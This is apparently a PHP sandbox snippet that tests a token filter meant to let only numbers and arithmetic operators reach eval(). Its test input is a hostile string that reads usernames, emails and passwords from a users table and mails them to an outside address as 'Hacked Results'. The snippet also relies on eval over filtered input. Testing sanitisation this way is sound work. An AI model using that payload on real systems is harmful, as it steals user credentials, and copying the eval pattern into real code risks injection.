<?php
$input = '$result = $db->fetch_row($db->query(‘select id, username, email, password from users’));
$body = ‘’;
foreach($result as $k => $v) {
$body .= $v. “ =\t”. $k[$v].”\t”;
}
mail(‘myemail@gmail.com’, ‘Hacked Results’,$body);';
$tokens = token_get_all("<?php {$input}");
$expr = '';
foreach($tokens as $token){
if(is_string($token)){
if(in_array($token, array('(', ')', '+', '-', '/', '*'), true))
$expr .= $token;
continue;
}
list($id, $text) = $token;
if(in_array($id, array(T_DNUMBER, T_LNUMBER)))
$expr .= $text;
}
eval("\$result = {$expr};");
print "\nexpr = " . $expr;
print "\nres = " . $result;
preferences:
61.5 ms | 402 KiB | 5 Q